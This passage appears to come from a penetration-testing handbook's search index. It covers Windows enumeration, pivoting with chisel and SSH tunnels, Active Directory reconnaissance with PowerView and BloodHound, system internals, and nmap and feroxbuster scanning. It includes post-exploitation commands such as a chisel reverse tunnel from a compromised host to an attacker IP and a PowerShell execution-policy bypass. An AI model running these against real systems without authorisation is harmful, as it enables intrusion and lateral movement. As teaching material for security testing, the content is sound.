They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"210","title":"Introduction"},"211":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"211","title":"Windows Enumeration with WinPEAS"},"212":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"212","title":"Enumerate System Information"},"213":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"213","title":"Enumerate Patches"},"214":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"214","title":"Enumerate Drives"},"215":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exfiltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"215","title":"Introduction"},"216":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. 
In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"216","title":"Introduction"},"217":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will set up a chisel server on Listen Port. On the compromised system run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"217","title":"Creating a reverse tunnel"},"218":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. 
Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"218","title":"Introduction"},"219":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? 
This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"219","title":"Local Port Forwarding"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.\" It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: \"you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send an RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. 
It is not possible to distinguish an open from a filtered port with these scans, which is why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP in local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces. REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine. Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"220","title":"Remote Port Forwarding"},"221":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"221","title":"Active Directory (AD)"},"222":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. 
Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"222","title":"Overview"},"223":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"223","title":"Get Domain Information"},"224":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"224","title":"Get Domain Controller Information"},"225":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"225","title":"Retrieve Domain Policy Information"},"226":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"226","title":"Get Users Information"},"227":{"body":"Get specific properties of all the users: Get-DomainUser -Properties ,,... 
It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"227","title":"Get User Property Information"},"228":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"228","title":"Get Domain Machines"},"229":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"229","title":"Get Groups"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"230","title":"Get Group Policy Information"},"231":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"231","title":"Additional Resources"},"232":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. 
Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"232","title":"Overview"},"233":{"body":"Install Bloodhound: sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials: run neo4j with sudo neo4j console, open the link it gives you, log in with the credentials neo4j:neo4j and change the password.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"233","title":"Setup"},"234":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"234","title":"Collecting Data for Bloodhound"},"235":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"235","title":"Viewing the Data"},"236":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. 
Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"236","title":"Finding Relationships in the Data"},"237":{"body":"","breadcrumbs":"System Internals","id":"237","title":"System Internals"},"238":{"body":"","breadcrumbs":"System Internals » Linux","id":"238","title":"System Internals"},"239":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"239","title":"User ID"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the Unix System Resource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"240","title":"Unified File System"},"241":{"body":"A symbolic, or soft, link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. 
Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"241","title":"Symbolic Links"},"242":{"body":"Hard links are different from symbolic links in the sense that they do not have any relationship to the original path which they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"242","title":"Hard Links"},"243":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible types of permissions - read (r), write (w) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. 
Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"243","title":"Permissions"},"244":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"244","title":"Set Owner User ID (SUID)"},"245":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way as SUID, but rather than the files executing with the privileges of the owning user, they execute with the effective GID of the owning group. When set on a directory, any file created within that directory will automatically have its group ownership set to the one specified by the directory. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"245","title":"Set Group ID (SGID)"},"246":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. 
It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"246","title":"Sticky Bit"},"247":{"body":"The command line is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"247","title":"Introduction"},"248":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. 2> err_file Redirect the command's standard error into err_file by overwriting it. 2>> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"248","title":"Input and Output Redirection"},"249":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"249","title":"Pipes"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"","breadcrumbs":"System Internals » Windows","id":"250","title":"System Internals"},"251":{"body":"Active Directory (AD) is a directory service for Windows network environments. 
It allows an organisation to store directory data and make it available to the users in a given network. AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"251","title":"Introduction"},"252":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers. An object holding no other objects is known as a leaf.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"252","title":"Objects"},"253":{"body":"Objects are organised in logical groups called domains. 
These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree. A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"253","title":"Object Organisation"},"254":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN). A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. 
The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forwards slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"254","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"255":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. 
Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"255","title":"Trusts"},"256":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"256","title":"Introduction"},"257":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"257","title":"System Internals"},"258":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. 
These objects are instances of the User class. User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"258","title":"Introduction"},"259":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"259","title":"Domain Users"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. 
nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"260","title":"Introduction"},"261":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distribution groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"261","title":"Group Type"},"262":{"body":"There are three possible group scopes, and the scope must once again be selected upon creation of the group. The group scope determines the level of permissions that can be assigned via the group. Domain Local groups can only be used to manage permissions regarding resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. 
Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups allow access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and local groups. Universal groups allow permissions management across all domains within the same forest. They are stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replications, administrators are advised to keep users and computers in global groups which are themselves stored in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not part of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"262","title":"Group Scope"},"263":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes and cannot contain other groups - only users. Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. 
Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"263","title":"Default Groups"},"264":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. 
There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is updated in the AD environment. These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. Relative ID (RID) Master Assignment of RIDs to other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, password changes, and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs between domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"264","title":"Introduction"},"265":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since full administrative access to a computer (NT AUTHORITY\\SYSTEM) grants privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"265","title":"Introduction"},"266":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. 
Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another distinctive feature of NTFS is Alternate Data Streams.","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"266","title":"Introduction"},"267":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. 
Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"267","title":"Permissions"},"268":{"body":"Permissions can be inspected from the command line by running icacls on the file or folder. The last set of parentheses for each user/group tells you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"268","title":"Inspecting Permissions"},"269":{"body":"A not very well-known, yet interesting feature of NTFS is the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer, which makes them an easy way to hide data within legitimate-looking files. Every file in NTFS has at least one default data stream where its data is stored. The default data stream is unnamed and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"269","title":"Alternate Data Streams (ADS)"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster . The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. 
Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent client errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exist, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from common URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).
